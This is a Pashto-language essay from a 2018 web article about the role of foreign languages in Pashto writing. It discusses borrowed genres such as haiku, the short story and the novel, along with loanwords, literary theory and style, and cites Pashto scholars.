چهارشنبه , 17 اکتوبر 2018
کورپاڼه / لیکنې / ټولنیزه / په لیکوالۍ کې د بهرنیو ژبو رول

په لیکوالۍ کې د بهرنیو ژبو رول

لیک:  فهیم بهیر

د لیکوالي یو ځانګړی اړخ فن دی، خو بل اړخ یې د زدکړو، تجربو او هڅو په اساس پیاوړی کېږي. زما په اند د دویمې برخې تجربه او عملي کارونه په لومړۍ برخې هم اغېزه کوي او لومړنۍ برخه نوره هم ځواکمنه کوي. په دې برخه کې د نورو اساسي عواملو تر څنګ بهرنۍ ژبې هم ځانګړی نقش لري، چې د بهرنۍ ژبو په زده کړې سره، لیکوال په ګڼو برخو کې معنوي او مادې پرمختګ کولای شي .

زموږ په دې لیکنه کې د بهرنیو ژبو څخه هدف هغه ژبې دې چې اوسهال د نړۍ د پرمختللو هېوادونو ژبې دې، موږ په دې لیکنه کې د هغوی نوم لیک نه وړاندې کوو، بلکې د یو شمېر ژبو هغه تیوري او مهمو اړخونو ته اشاره کو، چې زموږ ژبه، ادب او لیکوالۍ ور سره پرمختک کړی او یا په دې برخه کې اساسي رول لري ، د بهرنیو ژبو زده کړه د ځوانو لیکوالو، څېړونکو او ادب محصلینو سره د یوې ښه لیکوال، ادب څېړونکي او د ښې لیکنې په رامنځته کېدو کې پوره مرسته کوي.

په لیکوالۍ کې د بهرنیو ژبو د رول په اړه ځینې مهم ټکې په په لاندې توګه تر څېړنې لاندې نیسو:

۱ ـ د نوي ژانرونو پېژندل: د نړۍ پرمختللي هېوادونه د پرمختګ په حال کې دي، دوی نه یوازې په سیاسي او اقتصادې لحاظ پرمختګ کوي، دوی په علمي او فرهنګي لحاظ هم د ځینو نورو هېوادنو په پرتله پرمختک کړی دی. د خپلې ژبې ادبي، ګرامري، تیوري او نور اړخونو کې کار کوي ځینې شیان له نوي زاویو ګوري، چې په پایله کې نوې موضوعات او نوې ژانرونه رامنځته کېږي، دوی په نوي ژانرونو کې نوي خیالونو یا د ژوند بیلابیلې خوا وې ځای پر ځای کوي، خو وروسته د څو لسیزو دا نوي ژانرونه وروسته پاتې هېوادونو ته د ژباړو د لارې داخلیږي.

زموږ د لرغوني ادب تاریخ که د غزل، قطعې، مثنوي یا په ټوله کې د عروضي ادب ژانرونو ته ځېر شو ډیری د ژباړې د لارې د عربي او پارسي د ژبې څخه داخل شوي دي. د نمونې په توګه زموږ د لرغوني ادب په تاریخ کې د دې سرلیک: « پښتو ادبیات د نوو شعري ډولونو د خپلولو په درشکل کې» لاندې لیکل شوي دي: « د پښتو شاعرۍ کې له دغو خپلو ملي او وطني شعري ډولونو سر بېره د خپلې سیمې د فرهنګي او ادبي جریان تر اغېز لاندې او له نورو فرهنګونو سره د نزدیکتونو له پلوه پښتو شاعرانو د شرقي شاعرۍ شعري ډولونه هم خپل کړي دي، لکه: د درېیمې هجري پېړۍ په جریان کې په پښتو شاعرۍ کې قطعه پیدا شوه او په پنځمه هجري پېړۍ کې د قصیدې په چوکاټ پښتو شاعرۍ وشوه. خو د اتمې هجرې پړۍ تر دوهمې نیمايي وروسته چې د پښتو کوم اثار ایجاد شوي دي او موږ ته یې نمونې رسیدلې دي په دغو اشعارو کې د شرقي شاعرۍ ځینې داسې انواع په پښتو شاعرۍ کې مومو، چې تر دې زمانې د مخنیو اشعارو کې موږ داسې شعري انواع نه لرو.

… د ده د دیوان په دغو پاڼو کې د اکبر دوې ټوټې (مثنوي) خوندي دي… د اکبر زمینداور د دیوان په لاس ته راغلو پاڼو کې د پښتو دوې غزلې هم شته…د اکبر د دیوان په لاس ته راغلو پاڼو کې د شرقي شاعرۍ د دوو مشهورو او عمده شعري ډولونو لکه غزل، مثنوي د نمونو تر څنګ د پښتو چابیتې موجودیت په دې دلالت کوي چې زموږ پخوانیو شاعرانو که د شرقي شاعرۍ شعري ډولونه خپلول»«۱۲: ۶۸».

استاد حبیبي په خپل اثر« د پښتو ادب لنډ تاریخ» کې د (۱۲۵۰ هـ ق) را پدیخوا په یوه پېړۍ کې د پښتو ادب د تحول خینې عاملونو په ګوته کړي دي، چې موږ یوازې یو عامل دلته راوړو: « په دې وروستۍ دوره کې د پښتو په نظم او نثر دواړو کې د ترجمې حرکت هم پیدا شو، ځینې کتابونه له اردو او انګریزي څخه او ځینې هم له عربي او فارسي څخه په پښتو ترجمه شول، … د ترجمې دغه حرکت و چې له ځانه سره یې نوي فکرونه او د نوي مدني ژوند اساسونه هم راوړل او پښتو ادب ته یې یو نوی ادبي تحول ور وبښه، په دې ترجمه کې شاعران او لیکوالان دواړه مجبور وو چې په داسې ژبه خبرې وکړي چې لوستونکي یې په مطلب ښه پوه شي. نو له دې جهته هم په نظم هم په نثر کې رواني او شکفتګي موجوده شوه، خلک خپل قدیم تاریخ ته متوجې شول او د اروپا د مدنیت او د ژوند نوي فلسفي فکرونه هم په نظم او نثر کې وارد شول او هغه فکري انقلاب چې د ۱۹ قرن له ملي او قومي نهضتونو سره راغلی و د پښتو ادب ته یې هم نوې ښکلا، نوې مفکوره او نوي تغیرونه ور وبښل»« ۲: ۱۸۰».

اوسمهال په پښتو ادب کې ازاد شعر او هایکو ډېر مروج شول په دې شعري فورمونو کې ګڼ شمېر اثار چاپ شوي دي او ډیری شاعران او مینوال یې هم پیدا کړي دي چې ازاد شعر لومړی په اروپا کې رامنځته شوی دی او وروسته یې پښتو ادب ته لار وکړه. همدا ډول هایکو یو جاپانی شعر دی، چې ځینې پښتو ادب څېړونکي یې له لنډیو سره ډېر نژدې ګنې په دې فورم کې د کوزې پښتونخوا ډیری شاعرانو اثار چاپ کړي دي خو اوسمهال یې په افغانستان کې هم بازار ګرم دی .

هایکو فورم یا شکل : هایکو د شکل له مخې لنډ فورم یا شکل دی خو دمعنا له مخې بشپړ دی چې قافیه نه لري او درې نیم بیتۍ وي، سیلابوتونیک (Syllabus- tonic) جوړښت لري چې هر نیم بیت یې په ترتیب سره ۷،۵ او ۵ هجاوې وې«۱۷: ۲۸۶».

اوسمهال د پښتو ژبي مهم نثري ژانرونه، چې ډیری اثار پرې چاپ شوي دي، د ادبیاتو په تیورۍ کې ځانګړی ځای لري او د ادبیاتو په ایجاد کې مهم رول لري دا ژانرونه یا شکلونو هم د نړۍ له نورو ژبو څخه پښتو ژبې ته داخل شو ي دي، چې په څو کرښو کې به په لنډه توګه ورته اشاره وکړو: « خو هغه څه چې اوس یې موږ لنډه کیسه بولو او په اصطلاحي لحاظ د غربي ادب له «شارټ ستوري» سره هم معنا ده، په اوسني مفهوم او ځانګړې فني بڼه په نولسمه پېړۍ کې په اروپا کې دود شوې او له هغه ځایه یې د نورې نړۍ ادبیاتو ته لاره موندلې ده، له څېړنو څخه جوتېږي چې دغه نثري ادبي فورم له انګریزي ژبې څخه اردو او بیا له هغې څخه د شلمې پېړۍ په لومړیو کې پښتو ادب ته راغلې ده« ۱۳: ۶۲».

ناول هم پښتو ژبې ته د ارودو ژبې له ژباړې څخه راغلی، چې وروسته سید راحت زاخیلي هم په دې برخه کې ځلیدلی دی او د «مارخې» په نوم یې ناول ولیکه«۱۳: ۱۱۶».

همدا ډول ډرامې لیکنې بهیر په افغانستان کې د شلمې پېړۍ دویمې لسیزې ته رسیږي چې لومړنۍ څرکونه یې د مولوی صالح محمد کندهاري په آثارو کې لیدل کېږي« ۱۳: ۲۳۷».

طنز هم په افغانستان کې د لومړي ځل له پار د استاد حبیبي په لیکنو کې لیدل کېږي. نوموړي خپلې ګڼې طنزې لیکنې په طلوع افغان کې خپرې کړې دي« ۱۳: ۲۹۱».

ادبي ټوټه هم پښتو ادب ته لومړی د ژباړې د لارې داخل شوې ده، لومړی په لویدیځ ادب کې رامنځته شوې ده او په افغانستان کې په دې فورم کې لومړي ځل استاد حبیبي لیکنې کړې دي« ۱۳: ۳۳۲».

په دې فورم کې وروسته نورو لیکوال هم ګڼ شمېر اثار چاپ کړي او اوسمهال یې د لنډو کیسو، ناولونو نه وروسته درېیم بازار خپل کړی دی.

۲ ـ د نویو اصطلاحاتو رامنځته کېدل: د بهرنیو ژبو په زده کړې سره د لیکوال په لیکنه کې نوي اصطلاحات رامنځته کېږي، چې یو ځانګړی مفهوم تشریح کوي. د نویو اصطلاحاتو لیکل په لیکنه کې علمې خوا وې قوي کوي، د نویو تیوریو او نویو ژانرونو او اړخونو په پېژندنه او د لیکنې په قوت کې اساسي رول لري. نوي اصطلاحات د بهرنیو ژبو د لارې لیکنې ته داخلییږي، د دې اصطلاحاتو په پېژندنې سره د لیکنې په لفظي او معنوی برخو کې نوی بدلون رامنځته کېږي او لیکنې ته نوی والی هم ورکوي.

د نمونې په توګه په جادوګر هنر کې رحمان بابا د شعر سبکي خصوصیاتو په اړه لیکل شوي دي: « رحمان بابا چې خپل شعر یادوي معمولاً ستاینه یې کوي، خو چې ځان یادوي ځان غندي. دی د خپل خوی او عمل د ذکر په وخت انډرسټېټمنټ (Understatements) ته تمایل لري، یعنې غواړي ځان کم وګڼي»«۹: ۳۰۴».

په پورتني متن کې د انډرسټیټمنت د اصطلاح په پېژندنې سره موږ په اسانۍ سره کولای شو د نورو شاعرانو په سبکي ځانګړنو کې دا برخه هم وپېژنو.

په پخوانیو ګرامري اثارو کې ما د ټاکندویانو(Determiners) برخه نه وه لیدلې اوسمهال چې د کابل پوهنتون استاد پوهاند محمد صابر خویشکي د پښتو معاصر ګرامر لیکلی په هغې د دې برخې په اړه لیکلي دي: « هاکي او متیاک (۱۹۹۸) زیاتوي چې د مانا د یوې نارسمي تشریح په توګه، د کلمو دغه ډله د نومیز عبارت تفسیر ته کمي معلومات(د بېلګې په توګه دغه سپی، څو سپی، ډېر سپي) خو صفتونه د نومیز عبارت تفسیر ته کیفي معلومات(د بېلګې په توګه غټ سپی، تور سپی چټک سپي، وږي سپی) دغه کلمې په انګریزې کې Determiners او په پښتو کې د ټاکندویانو په نامه یادیږي»« ۳: ۲۹۲».

۳ ـ نوي کلمات: پښتو ژبې اوسمهال د نړۍ له نورو ژبو څخه نوي ژانرونه راخپل کړي دي، د دې ترڅنګ نوې اصطلاحات او کلمات هم راننوتي دي. یو شمېر کلماتو له پاره ځینو لیکوالو د پښتو کلمې کارولي دي، خو ځینې د خپل علمي قوت او پوخوالي له امله په خپل شکل کارول کېږي. دا کلمات د نوي موضوعاتو په لیکنو کې ډېر کارول کېږي. په ادبي څېړنو کې، تاریخ لیکنه، کره کتنه او نورو برخو کې ډېر کارول کېږي. دا کلمات د ژبې په غنیتوب کې هم ګټور دي او پېژندل یې د لیکوال سره د پوهې او لیکوالۍ د مهارت په وړاندې کولو کې هم مرسته کوي.

ځینې لیکوال بهرني کلمات یا سخت کلمات په دې هدف کاروي چې لیکنه یې قوي معلومه شي او خپله لایقه، خو دا کار په لیکوالۍ کې یو ستر عیب دی. ځینې لیکوال د یوې لیکنې د رېښې د قوت او علمیتوب په هدف همغه بهرنۍ کلمه یا سخته کلمه کاروي چې د مفهوم په وړاندې کولو کې د لیکوال او لوستونکي سره مرسته کوي دا بیا ښه ځانګړنه ده. د وخت سیاسي، اقتصادي او فرهنګي وضعیت او ټکنالوژۍ پرمختګ هم په دې برخه کې ستر اغېز لري چې نوې کلمې رامنځته کېږي او په لیکنو کې کارول کېږي . د نمونې په توګه که موږ د استاد روهي اثر«پښتو معاصر تاریخ» متن لولو نو اړتیا ده چې د لاندې کلمو او اصطلاحاتو په معنا پوه شو:

اپټیمیزم(Optimism) (خوشبنیي)،استیتیکس (ښکلاپېژندنه)، ابجکټویټي (Objectivity) (عینیت ګرايي)، ایماژ(I mage) (ذهني انځور)، پاسیفیزم (سوله غوښتنه)، پسمیزم (Pessimism ) (بد بیني)، تطور(تحول)، ډینامیزم (Dynamism)) محرکه قوه)، ریفرنډم(Referendum) (په یوه سرنوشت ټاکونکې مسله کې د ټولو خلکو رایو ته مراجعه کول )، سټاټس کو( Status quo) (مخالف تحول)، شهود(لیدل)، فانتیزي (Fantasy) (خیال)، فور مالیزم (Formalism) (شکل پرستي)، قرض الشعر(د شعر تحلیل او ارزیابي، مضراب (د وهلو اله)« ۵: ۳۴۳».

۴ ـ نوې تیوري: د بهرنیو ژبو په زده کړې سره په لیکوالي کې نوې تیوري هم رامنځته کېږي. بهرنۍ ژبو کې نوی تغیرات او پرمختګونه لیدل کېږي او ځینې لیکوال کوښښ کوي چې همغه تیوري یا د یوې نوې تیوري په رامنځته کېدو سره هغه تغیرات په خپله ژبه کې هم پلي کړي. کله چې د کوم لیکوال په لیکنه کې که هغه شعر وي، نثر وې یا نورې ادبي او ګرامري څېړنې وې نوې تیوري څرګنده شي، د لیکوال لیکنه قوت پیدا کوي، خپل ارزښت ټاکي، لیکنه یې علمي او ادبي معیار ګټي او ګڼ شمېر لوستونکي هم پیدا کوي.

زموږ په ژبه کې هم یو شمیر هغه لیکوال چې بهرنۍ ژبې یې زده دې د هغوی تیوري په خپله ژبه کې هم پلي کوي یا د هغوی د تیوریو په رڼا کې د خپلې ژبې مسایل له یوې زوايي څېړې. د نمونې په توګه به یو شمېر برخې د ځینو اثارو څخه را په ګوته کړو:

د جملې د اهنګ په اړه ګڼ شمېر لیکنې هم شوې دي، خو د پوهاند محمد اقا شېرزاد په خپل اثر«پښتو نحوه» کې دې برخې ته داسې اشاره کړې ده: « آهنګ د هغو وسایلو مجموعه ده، چې وینا تنظیموي او د وینا د وییزې بڼې حتمي خصوصیت دی، بې له اهنګه وینا ممکنه نه ده، هغه وسیلې چې د اهنګ د اجزاوو په حیث د وینا به وییز نظم کې برخه اخلي دا دی:

۱ ـ میلودي: د اساسي توکو د اواز حرکت (ټيټېدل او لوړېدل) دي.

۲ ـ ټیمپ: د جملې پر کومې برخې د اوازونو توقف دی.

۳ ـ خج: چې د جملې کومه برخه نسبت نورو برخو ته په زیات فشار سره ویل کېږي.

۴ – ټیمپ: چې د جملې یوه برخه د نورو برخو په تناسب په زیات سرعت سره ویل کېږي.

۵ ـ ټیمبر: یعنې د جملې موسیقیت.

د آهنګ دغه پروتنی اجزا د مفاهیمې په پروسه کې په ګډه په یوه وحدت کې عمل کوي»«۶: ۷۸».

په پورتنۍ نمونه کې لیدل کې چې د بهرنۍ ژبې د زد کړې له امله د اهنګ د اجزاو په اړه نوې برخې هم پېژندل شوې دي.

د «شعر د پېژندنې او کره کتنې ځینې نوي معیارونه» تر سر لیک لاندې څېړندوی عبدالغفور لېوال یوه لیکنه کړې ده، په دې لیکنه کې لیوال د شعر د پېژندنې له پاره دارواپوهنې له تعریفونو او اړیکو څخه کار اخیستی دی. د ارواپوهنې په څېړنې سره د شعر د سرچینې په اړه نوې خبرې شوې دي په هغه کې د شعور او لا شعور خبره رامنځته شوې ده، نوموړي لیکلي دي: « د شعور تر شاه د لا شعور ساحه، چې نوې ارواپوهنې را وپېژندله، له موږ سره مرسته کوي ، چې نور هم د شعر الهامي سرچینې ته ورلنډ شو. په حقیقت کې د اشیاوو، اشخاصو، احساساتو، عواطفو غریزو او تمایلاتو خاطرې له شعور څخه وتلو د لا شعور ساحې ته تنبول کېږي او هلته زېرمه کېږي. وروسته د ځانګړو روانې پېښو یا شرایطو له امله د بېرته را څرګندېدو له پاره یو کوچنی منفذ یا لار مومي. چې ډېر ځله خوب لیدلو ته په ورته تصور کې ځان را څرګندوي، همدغه له لا شعور څخه راوتلې خاطرې که د تخیل د ځواک په وسیله خوندي او د یوې شعوري هڅې په مرسته که لنډه او اهنګینه ژبه بیان شي، د بشپړولو له پاره یې تفکر او تخیل مرسته وکړي نو په حقیقت کې موږ یو شعر تخلیق کړی دی» « ۱۱: ۱۰۳ ».

په پورتني متن کې لیدل کېږي چې لیکوال د ارواپوهنې د علم په رڼا کې د شعر د سرچینې په اړه نوې تیوري لري او د شعر د سرچینې د پېژندنې نوې لارې چارې یې تشریح کړې دي.

د سبک د پېژندنې په اړه ګڼې مقالې لیکل شوي دي، خو د «نثر لیکلو په هنر» کې د سبک په اړه نوې مقاله لیکل شوې او د سبک د پېژندنې لارې چارې پکې په اسانه ښودل شوې دي. په دې مقاله کې د سبک په اړه د کورنیو او بهرنیو لیکوالو نظرونه وړاندې شوي دي خو په اخر کې دا تعریف وړاندې شوی دی: « د سبک یو بل مشهور او معاصر تعریف چې له نورمNorm څخه کږېدلو او انحراف ته سبک وايي، د پاسنیو خبرو تاییدونکی دی. په دې تعریف کې له نورم څخه منظور په سبکي لحاظ هماغه خنثی یا شنډ حالت دی»« ۱۰: ۳۴».

زما په اند پورتنی تعریف د لودیځې ژبې څخه داخل شوی دی او د «نثر لیکلو هنر» لیکوال د بهرنۍ ژبې د مطالعې وروسته خپلې ژبې ته د سبک د پېژندنې په اړه نوې تیوري وړاندې کړې ده، چې هم د سبک په پېژندنه کې مرسته کوې او هم د لیکوال لیکنې ته یې د نورو لیکنو په پرتله غوراوی ورکړی دی. استاد غضنفر د سبک د پېژندنې په اړه خپله نظریه داسې وړاندې کړې ده: « له نورم څخه زیاتوالی له مختلفو اړخونو مطالعه کولای شو. مثلاً که په یوه لیکنه کې خاص ډو جملې(مثلاً سوالیه جملې، لنډې جملې، مرکبې جملې، فعلي جملې، اسمي جملې..) تر معمول حد زیاتې وي، دا له نورم څخه انحراف دی. د ځینو نثرونو اهنګونه ډېر محسوس وي او د ځینو لږ، په ځینو لیکنو کې د ابهام ښکلا وینو او په ځینو کې نورو کې د وضاحت رڼا، یو شمېر لیکوال اطناب ته مایل دي او ځینې نور ایجاز ته. د دغو او داسې نورو ګڼو تمایلاتو پېژندنه د سبک پېژندنې موضوعات دي» « ۱۰: ۳۶».

۵ ـ د لیکنې ښکلا: د بهرنیو ژبو په زده کړې سره په لیکنې کې په بیلابیلو برخو کې هغه ښکلاوې هم رامنځته کېږي، چې لیکنه کې کشش، جذبه ، تلوسه پیدا کوي، دا برخې که په معلوماتې لیکنه کې هم وي تر ډېره بریده لیکنه بریالۍ ښکاري، چې زیاتره مهال د لیکنو په پیل کې موجوده وي تر څو لوستونکي پاتې معلوماتې لیکنه په مینه او تلوسې سره ولولي. زموږ د ژبې ډیری لیکوال د داسې لیکنو ډېرې بیلګې لري، چې د لیکنې پیل په داسې انداز کوي، چې لوستونکی هوسیږي تر څو پاتې لیکنه ولولي. دا لارې چارې هم د بهرنیو ژبو د زد کړې له لارې ډیری مهال رامنځته کېږي. د نمونې په توګه د استاد اجمل ښکلي د لیکنې پیل راوړو، چې نوموړي د موسی شفیق د شاعرۍ په اړه لیکلي دي: « ژان پل سار تر ویلي وو، چې د مونالیز پر شونډو رنسانس خاندي. همد اسې د مرحوم موسی شفیق په شاعرۍ کې راته تر انقلاب مخکنی افغانستان موسکی دی. هغه وخت حالات څنګه وو، خلکو څه ډول فکر کاوه او شاعرۍ کوم لوري ته روانه وه، دا راته مستقیم او نامستقیم د هغه وخت شاعري وايي« ۸: ۷۷ ».

په پورته بېلګه کې وینو چې د لیکنې پیل ځانګړې ښکلا لري او دا ښکلا د بهرنۍ ژبې د زده کړې په پایله کې رامنځته شوې او د لیکوال لیکنه یې هم خونده وره کړې ده.

۶ ـ د لیکنې معنوي اړخ: د بهرنیو ژبو په زده کړې سره په لیکنه کې معنوي اړخ هم پیاوړې کېږي. د بهرنیو ژبو د زده کړې په پایله کې نوي فکرونه، د علمي موضوعاتو په تړاو نظریې، د ادب ، علم او د ژوند د نورو مسایلو په اړه نوي فکرونه وړاندې کېږي. دا فکرونه د لکینې منځپانګه قوي کوي او په لیکوالۍ کې ستر ارزښت لري. که هر څومره ښه لیکنه وي چې منځپانګه یې بې ګټې او بې ارزښته وي خپل ارزښت نه شي ساتلای. د دې کار له پاره د بهرنیو ژبو زده کړه مهمه ده، چې د نورو ادبپوهانو او عالمانو د تیوریو او نوي فکرونو په رڼا کې موږ هم د خپلې ادب، فرهنګ او د ژوند نورو برو ته ترې رڼا واخلو.

که موږ ګرامر لیکنه کوو او په دې کې یوازې د خپلو پخوانیو لیکل شو اثارو څخه ګټه واخلو نو په حقیقت کې مو د پخوانیو کار په تکراري توګه وړاندې کړی دی. که موږ بهرنۍ ژبې زده کړو د هغوی د تیوریو په رڼا کې د نوي نظریو په اساس خپله ژبه هم و ارزوو، کیدای شي نورې نوې خوا وې په کې پیدا شي. نو کله چې نوې لیکنه رامنځته شي نوې منځپانګه ولري لیکنې معنوي اړخ قوي کوي دا لیکنه د ژبې، ادب او لوستونکو له پاره ګټوره ده. د نمونې په توګه په تشریحي ژبپوهنه کې د مورفولوژیکي اوښتنې تر سر لیک لاندې لیکل شوې دي : « … ساندهي یا غونډله غږونج(Sandhi ) : چې له اره په سانسګریت پورې اړه لري، خو کیدای شي په پښتو کې یې هم څرک ولګي. د ساندهي معنا پیوستون دی. هغه داسې چې په یوه غوڼډله کې د ځینو ویونو د پای غږونه د ورپسې ویونو د پیل له غږونو څخه اغېزمن شي، لکه : (زه سین ته تللی وم) چې اره بڼه یې (زه سیند ته تللی وم) دی، چې دلته د (سیند) دویي (د) د ورپسې ويي یعنې (ته) له (ت) غږ څخه اغېزمن شوی او نه تلفظ کېږي« ۴: ۸۲».

ډیری مهال د بهرنیو ژبو د لیکوالو د نظریو پیل سره هم د لیکنې معنوي اړخ قوي کېږي خو کله کله د کلیشو تر حده رسي، مګر که چېرې د لیکوال د پیغام په رسولو کې د مرستې په توګه راوړل شي، او د لیکني د منځپانګې په غنیتوب او اهمیت کې ونډه واخلي، نو د لیکنې معنوي اړخ ته ښکلا وربښي. د نمونې په توګه : « په زده کړه کې د سمعي او بصري وسیلو مرستې: د اوسني ارواپوه کور نباخ له نظره : زده کړه (د سلوک او روش بدلون څخه عبارت ده) ، دا چې زده کړه څه ډول تر سره کېږي او اموزش څنګه صورت نیسې او د زده کړې عملیه څنګه اسانه کېږي. نوموړی پوه اووه توکي (عنصره) د زد کړې د عملیې، مرستندوی بللی دی، هغه په لاندې توګه یادوي:۱ـ زمینه یا دریځ(موقف).۲ ـ شخصي ځانګړنې(خصوصیات). ۳ ـ موخه(هدف). ۴ ـ تعبیر. ۵ـ کړنه(عمل). ۶ـ پایله(نتیجه). ۷ـ د ماتې(مغلوبیت) په وړاندې عکس العمل»«۶: ۱۵۵».

یوه بله نمونه هم وړاندې کو چې د بهرنیو ژبو په زده کړې سره زموږ د لیکنو منځپانګې د نوې فکرونو له امله غني کېږي او داسې لیکنې به ټولنه کې تلپاتې ارزښت ساتي او لوستونکي هم لري، د ژبې ادب او فرهنګ ته هم ګټه رسولای شي. د پښتو ګرامر په خپله بڼه کې ( د ړندو لیک )تر سرلیک لاندې لیکل شوي دي: « یو فرانسوي پوهه چې (براېل) نومېده ، د خپلو ړندو د پاره یو ډول لیک رامنځته کړلو، چې یو ډول پنډ کاغذ د شا له خوا په مېخونوو ټونګري ، کاغذ د وړې دانوکۍ په څېر لږ را وه سپړېېږي، خو سوری کېږي نه. په دې دانو کېو ړانده ګوتې وهي او پرې پوهېږي چې څه لیکل شوي. اوس دا لیکونه د داروګانو په پوښونو هم لیکي. ما هم د خپل ړندو د پاره د خپلې ژبې سره برابر دا لیک تېار کړلو. پوره به نه وي خو یو پل(قدم) ګوندې وي« ۱: ۵۸».
۷ ـ د لیکنې لفظي اړخ: د لیکنې لفظي اړخ نه زموږ هدف د هغه لارو چارو زده کول دي، چې د لیکنې د کلمو، ترکیبونو، عبارتونو او د جملو د نور داخلي اجزاو تر منځ منطقي جوړښت ولري او د هر ژانر او موضوع ته په کتو یوه ښه لیکنې رامنځته شي چې لوستل یې اسانه، مطلب په کې ښکاره وي او د لیکوال پیغام په ښه توګه ولېږدوي. البته هره لیکنه د موضوع او فورم له مخې ځانته جوړښت لري، ژبه یې هم سره توپیر کوي. د بهرنیو ژبو د زده کړې څخه موږ هغه څه زده کوو، چې موږ د لیکنې په پورتنیو برخو کې ترې ګټه اخیستی شو. د نثر لیکلو په هنر کې لیکل شوي دي: « یوه انګریز لیکوال ویلي وو چې هغه لیکنه چې بې زحمته ولیکل شي، په زحمت سره لوستل کېږي او چې په زحمت سره ولیکل شي، بې زحمته یې لولو» « ۱:۱۰».

استاد غضنفر لیکي: « په شعري سبک کې معمولاً خیال، تصویر، مبالغه، موسیقي ابهام، ایجاز او ایهام وینو. په مقابل کې له نثر لیکونکي معمولاً غواړو چې خبرې دې یې تر وسه وسه واضح وي او د لیکنې جملې او پارګرافونه دې یې منطقي ارتباط سره ولري. لکه څوک چې خپل مقصد ته د رسېدو له پاره نېغه لار انتخابوي و د اخوا، ها خوا نه تاویږي، ښه نثر لیکونکی دې هم خپله موضوع نه پرېږدي، د مقصد په لور دې سم سیده روان وي. په انګریزي کې نثر ته Prose وايي او دا کلمه د لاتین ژبې له Prosa رغلې ده چې نیغ او سیده معنا ورکوي» « ۱۰: ۳».

په سبکپوهه کې لیکل شوي دي: « په لویدیځ کې په همدې موخه د متن غږونه او کلمې څېړل کېږي. زموږ په ټولنه کې پوهان پر عملي ډګر سبکپوهیز کره کتونکي نه مني، ځکه چې د دوی په اند نوموړي ته د پنځونې ښېګنې او بد ګڼې اهمیت نه لري، د موضوع ښه والي او بد والي ته نه ګوري. د پنځګرټولنیزې، اخلاقي اوسیاسي ژمنتیا تعهد ته ارزښت نه ورکوي … زما زړه خو غواړي چې د کره کتنې پر ځای ورته شننه ووایم، لکه ګوپي چاند نارنګ چې وايي: له سبکپوهې سره خبره وي، خو نظر نه، د ښکلا پلټنه د سبکپوهې کار نه دی»« ۷: ۱۷۵».

استاد ښکلي زیاتوي: « په پښتو کې په کار ده، چې سبکپوهیزې کره کتنې ته چې د پنځونې د سبک په ښېګڼو او بد ګڼو پسې ګرځي ډېر کار وشي. موږ باید په ګړنۍ او لیکنۍ دواړو که کتنو کې هڅه وکړو چې د نورو مواردو پر ځای د پنځونې سبک ته ډېر پام واړوو، ځکه چې سبک د پنځونې بنسټ دی، سبک پنځونه هنري کوي او که سبک نه وي، هغه شعر یا نثر ته هنري نه شي ویل کېدای، ځکه چې سبک له مجازي مانا نه راوړلاړیږي په حقیقي ژبه کې نه وي، نو دې ته خنثی یا صفر سبک«۷ : ۱۷۶».

په پورتنیو کرښو کې لیدل کېږي چې د بهرنیو لیکوالو، د نظریو او د کلمو د رېښو د شننې له مخې موږ د خپلې لیکنې په لفظي جوړښتونو کې کار اخلو او د همدې له امله زموږ لیکنې ځانګړی معیار او ارزښتوب هم پیدا کوي.

۸ ـ د لیکوال ټولنیز شخصیت: په ټولنه کې د هر مسلک خاوند ځانګړی شخصیت لري، ښه لیکوالۍ په ټولنه کې د لیکوال شخصیت لوړوي، نو د بهرنیو ژبو د زده کړې د لارې د ښې لیکنې لارې چارې زده کول کېږي، چې د لیکوالو لیکنو ته علمي او فني لوړتیا هم ورکوي او د هغوی د اثارو په چاپ کېدو سره د دوی موقف هم په ټولنه کې لوړیږي. د تکړه لیکوال اثار پلورل کېږي، لوستونکي لري، ډیری مهال یې خلک د هغوی هر اثار د هغوی د ښې لیکوالۍ له مخې لولي او په پیسو یې اخلي. په ټولنه کې د لیکوال د نقش په اړه لیکل شوي دي: « څرګنده ده، چې لیکوال لیکنه د ځان له پاره نه کوي. هغه چې د لیکنې له پاره هره طرحه او موضوع له ځان سره لري او د هغې د لیکنې له پاره قلم پورته کوي په دې پوهېږي چې په وړاندې یا مقابل کې لوستونکي شته، چې د ده لیکنه لولي او په یوه بله بڼه پر هغوی اغېز لري، نو له همدې امله د لیکوال مسوولیت هم دروند دی، هر لیکوال چې خپله دغه مسولیت، مکلفیت او د دندې سپیڅلتیا(تقدس) در کړی وي، په دې پوهېږي چې د ټولنې د وګړو د معنوي روزنې او پالنې دنده هم ور تر غاړې ده»«۱۴: ۶».

د لیکوال د ارزښت په اړه همدا ډول لیکل شوي: « که لیکوال نه وای نن به هم انسان په هغه بڼه ژوند کاوه، لکه څنګه چې یې زر ګونه کاله وړاندې کاوه. لیکوال ټولنې ته په سیاسي، فرهنګي، ساینسي، جنګي او عقیدوي او یا دې ته ورته برخو کې فکر ورکوي او په دې توګه ټولنې ته سوکالي او ارامي بښي. لیکوال که پنځونه او یا هم څېړنه کوي په یو نه یو ډول ټولنې ته د هغوی د کړنو په بهیر کې نوی او کره فکر ورکوي» « ۱۵: ۶».

۹ ـ ټولنې، علم او ادب ته یې ګټه: کله چې د بهرنیو ژبو د زده کړې په پایله کې د نورو هېوادونو د پوهانو نظرونه مطالعه شي، نوي تیوري او څېړنې مطالعه شي په پایله کې تاثیرات زموږ په لیکنو کې هم لیدل کېږي او په دې اساس زموږ د لیکنو علمي او فني جوړښتونه هم پخېږي، نوي کېږي او زموږ اوسنیو اړتیاو ته په کتو پر مخ ځي او وده کوي. ښې لیکنې د ټولنې وګړو ته علم او ادب ته ګټه رسوي، یوه سالمه ټولنه رامنځته کوي، نوې علمې لارې چارې را ښيي او د یو نږه او ښه ادب ټولې پېژندنې او ځانګړنې را معلوموي چې زموږ ادب هم ور سره وده کوي او ور سره ورو ورو د ښکلا نیمګړتیاوې پوره کوي. د تخلیقي ادب د رسالت او نقش په اړه باندې ګڼې لیکنې شوې دي دا چې څېړنه کومې ګټې لرې د «څېړنې بنسټونه» کې د استاد زلمي هېوادمل نظر داسې راوړل شوی دی: « د تېرې او اوسنۍ زمانې د حالونو د معلومولو لپاره د لټون د ذوق او میلان اقناع کوي. د انسان د مادي او معنوي ژوند د ارزښتونو د تغیر یا تثبیت لپاره د غوره او ښو لارو لټول. د علومو په بېلابېلو څانګو کې د علمي ژوند دوام. حقیقت ته د رسېدو لپاره د حرکت او هڅو ادامه. د څېړنې علاقه مندانو ته د تحقیق د لارو خلاصول. د پخوانیو په اند او ژوند پوهېدنه او د هغوی د فکري سیر مطالعه. د طبیعت په تحلیل او تجزیه کې د بشر د ذهني کوښښونو او تلاښونو پېژندنه. په خلکو کې د سلیم ذوق خپرول او د پخوانیو فرهنګي 